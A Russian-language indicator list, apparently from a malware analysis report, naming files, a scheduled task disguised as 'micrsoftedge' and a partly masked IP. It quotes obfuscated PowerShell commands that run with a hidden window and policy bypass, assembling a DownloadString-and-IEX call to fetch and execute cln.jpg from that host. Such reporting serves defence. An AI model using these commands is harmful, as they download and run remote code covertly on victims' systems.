Техническая информация
- <SYSTEM32>\tasks\micrsoftedge
- C:\users\public\clean.ps1
- C:\users\public\clean.bat
- C:\users\public\clean.vbs
- '51.##5.76.65':222
- http://51.###.76.65:222/Clean/Clean.txt via 51.##5.76.65
- http://51.###.76.65:222/Clean/cln.jpg via 51.##5.76.65
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VA...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.##5.76.65:222/Clean/cln.jpg'')'.RePLACe('VAN','ADSTRING');[BY...